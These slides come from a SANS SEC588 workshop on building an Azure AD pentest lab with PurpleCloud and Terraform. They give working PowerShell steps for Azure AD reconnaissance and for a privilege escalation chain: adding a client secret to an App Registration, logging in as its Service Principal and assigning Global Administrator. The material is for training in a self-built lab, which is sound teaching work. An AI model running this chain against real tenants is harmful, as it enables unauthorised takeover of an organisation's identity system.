SEC588 SANS Workshop Series

Building an Azure AD
Pentest lab for Red Teams

Jason Ostrom | Aaron Cure

Copyright 2022 SANS Institute | All Rights Reserved
Hey, what’s up. I’m Jason (He/Him)

• Builder of things @ SANS Institute

• Instructor, SEC588 à “Cloud Penetration Testing”
• Community tool contributor
• Family, hockey, football New tool! Cloud “edge” bug bounty
and recon tool
github.com/iknowjason/edge

SEC588 | Cloud Penetration Testing 2

Aaron

Principal Security Consultant

Author: https://amzn.to/3hXyNMA
SANS Instructor & Course Author
SEC542: Web App Penetration Testing and Ethical Hacking
SEC588: Cloud Penetration Testing
SEC474: Building A Healthcare Security & Compliance Program
DEV544: Secure Coding in .NET
Denver/Boulder OWASP Board Member
Certifications
CISSP, GCPN, GSSP.NET, GWAPT, GPEN, GMOB

SEC588 | Cloud Penetration Testing 3

Outline of today’s workshop

You will spin up your own Azure AD lab using automated tools to
simulate a common cloud adoption use case

- Section 1: Setting up the Azure AD lab

- Section 2: Azure Manual Reconnaissance
- Section 3: Azure Privilege Escalation
- Section 4: Destroy Lab Resources

We will use Azure Cloud Shell with Bash + Powershell combined with the
SEC588 Slingshot Linux VM to cover learning objectives.

SEC588 | Cloud Penetration Testing 4

 Attacking Identity Systems

Course Roadmap Intro to Authentication

Lab 2.1 Hunting For Keys
Username Harvesting in the Cloud
• Day 1: Architecture, Discovery, and Recon
Username Harvesting Tools
at Scale Lab 2.2 Finding Valid Users
Passwords
• Day 2: Attacking Identity Systems
Lab 2.3 Password Attacks
• Day 3: Attacking and Abusing Cloud Open File Shares
Lab 2.4 Hunting for Open File Shares
Services
Introduction to Microsoft Cloud Services
• Day 4: Vulnerabilities in Cloud-Native Azure AD
Authentication Standards
Applications
App Consent and Microsoft Graph
• Day 5: Infrastructure Attacks and Red Lab 2.5 App Consent and Graph Lab
Teaming

SEC588 | Cloud Penetration Testing 5

Infrastructure as code

Infrastructure as Code (IaC) - managing and provisioning

infrastructure automated through code instead of manually.
• Configuration is code, stored in a VCS (Github, Gitlab)
• Declarative, tracking desired state
• Benefits: Speed, consistency, repeatability, lower cost
• Each cloud provider has their own IaC service

IaC has many use cases for cloud deployments and DevOps. We can also use
it for security use cases as well!

SEC588 | Cloud Penetration Testing 6

 Terraform Overview

• Terraform - free, universal, and popular IaC tool that can

manage infrastructure with declarative files
• Build, change, and version infrastructure in AWS, GCP, Azure
• Providers
• plugins that talk to API for different cloud providers
• can provision Infrastructure, DNS, SaaS services, Kubernetes

Terraform can also be used to auto provision resources in Identity

solutions such as Azure Active Directory!

SEC588 | Cloud Penetration Testing 7

 Terraform

Code is used to define, compare, and apply changes

• Multiple Languages for configuration
• Hashicorp Configuration Language (HCL)
• Cloud Development Kit (CDK)
• C#, Java, TypeScript, Go, Python
• Simple command line interface

$ terraform init 1. terraform 2. Terraform

$ terraform plan CLI Provider AWS GCP
$ terraform apply Terraform
3. Target API
Registry Azure …

SEC588 | Cloud Penetration Testing 8

Tool Spotlight: PurpleCloud

• PurpleCloud is an open-source script that automates creation

of an Azure Active Directory security lab
• Site: www.purplecloud.network
• Python code generator for terraform files in HCL format
• Random generator for Azure AD user, Groups, Apps
• New feature: Azure privilege escalation scenario!

Sister tool BlueCloud supports

AWS!
Github.com/iknowjason/BlueCloud

SEC588 | Cloud Penetration Testing 9

PurpleCloud: Additional features

• IaaS security lab creation (ad.py)

• Create an IaaS Active Directory environment with Azure VMs
• Automated Domain Join of Windows 10 Pro
• Auto-login domain users for realistic simulations
• Deploys a SIEM (Hunting ELK) and endpoints instrumented with
Sysmon/Winlogbeat/Velociraptor/Atomic Red Team

SEC588 | Cloud Penetration Testing 10

PurpleCloud: New Security Lab Simulations

• Azure Sentinel (sentinel.py)

• Ship Windows 10 Pro logs (Symon + Security) to Sentinel
• AD environment with Domain Join + Azure Sentinel
• Azure Storage (storage.py)
• Azure Managed Identity (managed_identity.py)
• Phishing Application (phishing_app.py)

SEC588 | Cloud Penetration Testing 11

PurpleCloud: Basic Azure AD usage

• Command Line Options

• --upn (The UPN suffix or Domain)
• --count (Number of Azure AD users to create)
• --apps (Number of Applications to create)
• --groups (Number of Azure AD Groups to create)

% python3 azure_ad.py --upn <UPN> --count <Number Of users to create> --apps <Apps> --groups <Groups>

SEC588 | Cloud Penetration Testing 12

 PurpleCloud Example Usage 1
% python3 azure_ad.py --upn rtcfingroup.com --count 1000 --apps 3 --groups 5
[+] Number of users desired: 1000
[+] upn suffix: rtcfingroup.com Generate 1,000 random
[+] Desired applications enabled: 3 Azure AD users. Create
[+] Desired groups enabled: 5 3 Azure AD applications.
[+] Creating unique user list Create 5 Azure AD
[-] Duplicate user Matthew Wilson ~ not adding to users list Groups and assign those
[-] Duplicate user John Patel ~ not adding to users list users randomly into
[-] Duplicate user David Brown ~ not adding to users list
[-] Duplicate user Diane Adams ~ not adding to users list
groups.
[-] Duplicate user John Thompson ~ not adding to users list
[-] Duplicate user Matthew Cook ~ not adding to users list
[+] Number of users added into list: 1000
[+] Number of duplicate users filtered out: 6
[+] Creating output files for Azure AD Users
[+] Users csv file: azure_users.csv Automatically generate
[+] Username txt file: azure_usernames.txt the terraform files.
[+] Email addresses txt file: azure_emails.txt
Output three text files
[+] Terraform file: users.tf
[+] Creating terraform file: apps.tf
with Azure AD users, for
[+] Creating terraform file: groups.tf usage with other security
[+] Adding all Azure users to this group: Users tools.
%

SEC588 | Cloud Penetration Testing 13

Outputs Files in Text and CSV for usage by other security tools

SEC588 | Cloud Penetration Testing 14

 PurpleCloud Example Usage II

% python3 azure_ad.py -c 25 --upn rtcfingroup.com --apps 7 -aa -ga -pra Create a privilege
[+] Number of users desired: 25 escalation abuse
[+] upn suffix: rtcfingroup.com vulnerable scenario with
[+] Desired applications enabled: 7
Azure AD applications
[+] Creating unique user list
[+] Number of users added into list: 25 and role assignments.
[+] Number of duplicate users filtered out: 0 One randomly selected
[+] Creating output files for Azure AD Users Azure AD user is assigned
[+] Users csv file: azure_users.csv into the Application
[+] Username txt file: azure_usernames.txt Administrator role.
[+] Email addresses txt file: azure_emails.txt
[+] Terraform file: users.tf
[+] Creating terraform file: apps.tf
[+] Assigning the Privileged Role Administrator to HelpDesk_Application
[+] Assigning the Global Administrator role to ITOps_Application
%

SEC588 | Cloud Penetration Testing 15

Simulate an On-Premise Active Directory Lab

Create an AD Domain with 500 AD users. Create three

Windows 10 Professional endpoints, joining them to the
domain.

SEC588 | Cloud Penetration Testing 16

Users Placed into OU and AD Groups automatically

SEC588 | Cloud Penetration Testing 17

Each Windows 10 Pro Endpoint has a custom Terraform file created (for further
editing if desired)

SEC588 | Cloud Penetration Testing 18

Virtual Machines Created

SEC588 | Cloud Penetration Testing 19

Active Directory Created with 3 Domain Joined

500 Domain Users assigned into

different OU and AD Groups.
Three Windows 10 Pro joined to the
domain based on Python script.
SEC588 | Cloud Penetration Testing 20
Auto Logon Domain Users with AD credentials

With this feature, you can

practice lateral movements across
domain joined systems and
extracting domain credentials
from LSASS memory.

SEC588 | Cloud Penetration Testing 21

Passwords in AD default to Strong, but customizable

Default behavior is to auto-

generate a strong password and
assign to all users, putting into
CSV file.

Specify your desired password for

all users via command line
parameter.

SEC588 | Cloud Penetration Testing 22

Building Hunting ELK + Velociraptor with one endpoint

SEC588 | Cloud Penetration Testing 23

PurpleCloud Red Team Use Cases

• PurpleCloud: Automation for an Azure AD security lab

• Create an Azure AD Lab mirroring customer tenant, to practice privilege
escalation
• App Consent phishing campaigns + Social Engineering
• Create the lab with exact number of Azure AD users, to practice recon
tooling, username enumeration, password spraying behavior
• Blue teams to instrument Azure sign-in logs correctly + Detection
Engineering + Purple Teaming exercises
• R&D security research for new vulnerabilities or techniques
Terraform is increasingly used by Red Team Operators to build Red Team
Infrastructure; DevOps for “Security as Code”. Now you can add Azure AD
Red Team Lab as an option!
SEC588 | Cloud Penetration Testing 24
Overview: Azure AD Background

• Azure AD Applications are an abstraction for Application Objects

that allow some users to perform access operations on some data
(OAuth 2.0)
• Service Principals and App Registrations are two services
in Azure that work together to support Applications
• Service Principals in Azure can have RBAC Roles assigned to them.
• Service Principals login to Azure with credentials (a Client Secret), just
like regular users. If you steal a Service Principal credential, you can
login to Azure as that SP.

SEC588 | Cloud Penetration Testing 25

Overview: Azure AD Applications (I)

• A developer in your tenant creates an application

• An App Registration is the process of registering it in your tenant
• Can be created as single tenant (only your tenant) or multi-tenant
• When that app is Registered, it is given a Client ID or Application ID
that is globally unique within Azure
• The App Registration can be used to assign permissions to the App
• Defines 3 things:
• How tokens are issued to access the application
• Resources the application needs to access
• Actions the application can take

SEC588 | Cloud Penetration Testing 26

Overview: Azure AD Service Principal

• When that app is registered in your tenant a Service Principal

is created. Shows up in Azure à Enterprise Applications
• Service Principal is unique to your tenant; it’s a template of the
application that is specific to your tenant
• Service Principal is an Application Identity that is used to authenticate
users to the application and track/control consent for the app
• Enables core features such as authentication of the application during
sign-in, and authorization during resource access.
• Defines what the app can do, who can access it, and what resources the
app can access.

SEC588 | Cloud Penetration Testing 27

APPLICATION, APPLICATION OBJECT, SERVICE PRINCIPAL RELATIONSHIP

Service Principal

Security Object that defines access to

Serviceetc
resources, Principal

Security Object that defines access to

Application Object Service Principal
resources, etc
Application Security Object that defines access to
1 (and only 1) Application Object
Service
resources, etcPrincipal
Resides in Azure AD
Security Object that defines access to the app,
resources, etc

SEC588 | Cloud Penetration Testing 28

Example Azure Application: SSO with AWS and Azure as the Identity Provider

Azure Administrator adds the

AWS SSO application from The Application now shows in
Gallery from Enterprise your Tenant under Enterprise
Applications by searching for it. It Applications. It has an Object ID
is added into the tenant. unique to your Tenant. It has an
Application ID that is shared with
the App Registration. This is a view of the App
Registration. It was automatically
created when we added the
Application through Enterprise
Applications Gallery.

A multi-tenant App is the

basis for App Consent
Phishing Attacks using an
App Registered in Azure AD.

SEC588 | Cloud Penetration Testing 29

Company Background & Your Mission (1)

• Tecniqa: Fintech corporation embracing a multi-cloud strategy

• Customer-facing solutions hosted in AWS
• They use M365, On-premise AD DS
• Executive push to start development of some new applications in Azure,
taking advantage of Microsoft Identity platform
• Development in Azure has run unchecked
• CISO has ordered a security review of the Azure AD tenant
• You are a Security Engineer reporting to the CISO
• Your mission is to look for vulnerabilities in the Azure AD tenant,
starting with Azure users, groups, and applications
• Stand up an Azure AD lab replicating the configuration for Tecniqa.co
SEC588 | Cloud Penetration Testing 30
Company Background & Your Mission (1I)

• In these labs we will be abusing Service Principal attack

primitives for privilege escalation in Azure AD
• The lab creates 7 Azure AD Applications with some randomized
RBAC role assignments

SEC588 | Cloud Penetration Testing 31

 Section 1: Setting up the Azure AD Lab

Create Service Principal $ az ad sp create-for-rbac –role=“Owner” –scopes=“/subscriptions/SUBSCRIPTION_ID”

1. Assign Global Administrator. 2. Assign permissions: Application.ReadWrite.All,

Assign Permissions User.ReadWrite.All, Group.ReadWrite.All

$ export ARM_CLIENT_ID=“”; export ARM_CLIENT_SECRET=“”; export

Set Environment Variables ARM_TENANT_ID=“”; export ARM_SUBSCRIPTION_ID=“”

Run PurpleCloud $ python3 azure_ad.py -c 25 --upn YOUR_UPN --apps 7 -aa -ga -pra

Run terraform $ terraform init; terraform plan –out run.plan; terraform apply run.plan

SEC588 | Cloud Penetration Testing 32

Lab I: Lab Environment Setup

Please work on the lab exercise,

Lab 1, found in your wiki.

SEC588 | Cloud Penetration Testing 33

 Section II: Reconnaissance Overview (I)

• Command 1: Connect-AzureAD
• Summary: Connects with an authenticated Azure AD account
to a tenant so that further Azure Active Directory cmdlets can be
used.

PS /home/user> $username = "”

PS /home/user> $password = “”
PS /home/user> $securepassword = ConvertTo-SecureString "$password" -AsPlainText –Force
PS /home/user> $credential = New-Object System.Management.Automation.PSCredential($username, $securepassword)
PS /home/user> Connect-AzureAD -Credential $credential

SEC588 | Cloud Penetration Testing 34

 Section II: Reconnaissance Overview (II)

• Command 2: Get-AzureADDirectoryRoleMember -ObjectId

9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3
• Summary: Get AAD members assigned into the Application
Administrator role.
PS /home/user> $appadminObjectId = (Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Application Administrator'} | select
ObjectId).ObjectId
PS /home/user> Get-AzureADDirectoryRoleMember -ObjectId $appadminObjectId

Get the ObjectID for App

Administrator and then query
based on this ObjectID for
assigned users.
Application Administrator is a highly privileged role within Azure Active Directory RBAC. Any
user assigned into this role can manage and create all Enterprise Applications and App Registrations.

SEC588 | Cloud Penetration Testing 35

 Section II: Reconnaissance Overview (III)

• Command 3: Get-AzureADDirectoryRoleMember -ObjectId

e8611ab8-c189-46e8-94e1-60213ab1f814
• Summary: Get AAD members assigned into the Privileged
Role Administrator role.
PS /home/user> $praObjectId = (Get-AzureADDirectoryRole | ?{$_.DisplayName -eq ‘Privileged role administrator'} | select
ObjectId).ObjectId
PS /home/user> Get-AzureADDirectoryRoleMember -ObjectId $praObjectId

Get the ObjectID for Privileged

role administrator and then query
based on this ObjectID for
assigned Service Principals. Privileged administrator is a highly privileged role within Azure Active Directory RBAC. A
Service Principal assigned into this role can manage all role assignments – including assigning a user
into the Global Administrator role.

SEC588 | Cloud Penetration Testing 36

Lab II: Azure Manual Reconnaissance

Please work on the lab exercise,

Lab 2, found in your wiki.

SEC588 | Cloud Penetration Testing 37

Azure Privilege Escalation Overview

In this lab we are abusing a privilege escalation attack pathway.

Tecniqa Developers have assigned themselves excessive privileges.

• Application Administrators can manage Enterprise Applications

and App Registrations
• Including adding a new App Registration client secret
• Privileged Role Administrators (PRA) can assign users to roles,
including Global Administrator. If a Service Principal with PRA
is found in the tenant, this is the attack pathway.

The Application Administrator can login with the Service Principal of a PRA
and assign their own user to a Global Administrator

SEC588 | Cloud Penetration Testing 38

 Privilege Escalation Commands (I)

• Command 1: New-AzureADApplicationPasswordCredential
• Summary: Generate a new client secret for App Registration
based on the ObjectId of it.

PS /home/user> $AppKeyCred = New-AzureADApplicationPasswordCredential -ObjectId $targetObjectId

This cmdlet requires finding the

ObjectID of the App Registration
you wish to target for adding a
credential.
The Application Administrator role can add new client secrets for any App Registration.

SEC588 | Cloud Penetration Testing 39

 Privilege Escalation Commands (II)

• Command 2: Connect-AzAccount -ServicePrincipal

• Summary: Connect to Azure with a Service Principal for using
cmdlets from Az Powershell modules.

PS /home/user> $secret = $AppKeyCred.value

PS /home/user> $azurePassword = ConvertTo-SecureString $secret -AsPlainText –Force
PS /home/user> $cred = New-Object System.Management.Automation.PSCredential($azureApplicationId, $azurePassword)
PS /home/user> Connect-AzAccount –Credential $cred –TenantId $tenantId -ServicePrincipal

Take the new client secret from

the prior step. You also need the
Tenant ID & Application ID of the
Service Principal (username).

SEC588 | Cloud Penetration Testing 40

 Privilege Escalation Commands (III)

• Command 3: Connect-AzureAD -AadAccessToken

• Summary: Generate a Graph Token and connect AzureAD
Account with the Token
PS /home/user> $context =
[Microsoft.Azure.Commands.Common.Authentication.Abstractions.AzureRmProfileProvider]::Instance.Profile.DefaultConte
xt
PS /home/user> $aadToken =
[Microsoft.Azure.Commands.Common.Authentication.AzureSession]::Instance.AuthenticationFactory.Authenticate($context.
Account, $context.Environment, $context.Tenant.id.ToString(), $null,
[Microsoft.Azure.Commands.Common.Authentication.ShowDialog]::Never, $null, "https://graph.windows.net").AccessToken
PS /home/user> Connect-AzureAD -AadAccessToken $aadToken -AccountId $context.Account.Id -TenantId $context.tenant.Id

SEC588 | Cloud Penetration Testing 41

 Privilege Escalation Commands (IV)

• Command 4: Add-AzureADDirectoryRoleMember
• Summary: Assign role of Global Administrator to the user

PS /home/user> $gaRole = Get-AzureADDirectoryRole | ?{$_.DisplayName -eq 'Global Administrator'} | select DisplayName,

ObjectId,RoleTemplateId
PS /home/user> $gaObjectId = $gaRole.ObjectId
PS /home/user> PS /home/user> Add-AzureADDirectoryRoleMember -RefObjectId $userobjectId -ObjectId $gaObjectId

Pass the Object ID of the Global Admin role and the user you are assigning the role to.

SEC588 | Cloud Penetration Testing 42

Lab III: Privilege Escalation Abuse

Please work on the lab exercise,

Lab 3, found in your wiki.

SEC588 | Cloud Penetration Testing 43

 Section IV: Destroy Lab Resources

It’s a good idea for security and avoiding extra charges to delete all of
these lab resources if they aren’t being used.

Destroy via terraform $ terraform destroy –auto-approve

Delete the ”azure-cli-*” app used for Terraform in Azure portal under “Azure Active
Delete the Application Directory” à “App Registrations”

Delete Storage Account Delete the Azure Storage Account used for Cloud Shell in Azure Portal

SEC588 | Cloud Penetration Testing 44

References

[1] “Azure Privilege Escalation via Service Principal Abuse”

• https://bit.ly/3OUgAhN
[2] “Azure AD privilege escalation – Taking over default application
permissions as Application Admin”
• https://bit.ly/3R0jByC
[3] “Azure AD App Registrations, Enterprise Apps and Service Principals”
• https://bit.ly/3bxOsT7
[4] “Application and service principal objects in Azure Active Directory”
• https://bit.ly/3ywuv84

SEC588 | Cloud Penetration Testing 45

 Attacking Identity Systems

Course Roadmap Intro to Authentication

Lab 2.1 Hunting For Keys
Username Harvesting in the Cloud
• Day 1: Architecture, Discovery, and Recon
Username Harvesting Tools
at Scale Lab 2.2 Finding Valid Users
Passwords
• Day 2: Attacking Identity Systems
Lab 2.3 Password Attacks
• Day 3: Attacking and Abusing Cloud Open File Shares
Lab 2.4 Hunting for Open File Shares
Services
Introduction to Microsoft Cloud Services
• Day 4: Vulnerabilities in Cloud-Native Azure AD
Authentication Standards
Applications
App Consent and Microsoft Graph
• Day 5: Infrastructure Attacks and Red Lab 2.5 App Consent and Graph Lab
Teaming

SEC588 | Cloud Penetration Testing 46

Thank you for joining us today!

• That’s a wrap on our SANS Workshop on

Building an Azure AD Pentest Lab for Red
Teams!
• Consider joining the SANS Offensive Ops
Discord server at tinyurl.com/oodiscord
• Find us on #sec588

Jason Ostrom Aaron Cure

@securitypuck @curea
jostrom@stora.io aaron.cure@cypressdefense.com

SEC588 | Cloud Penetration Testing 47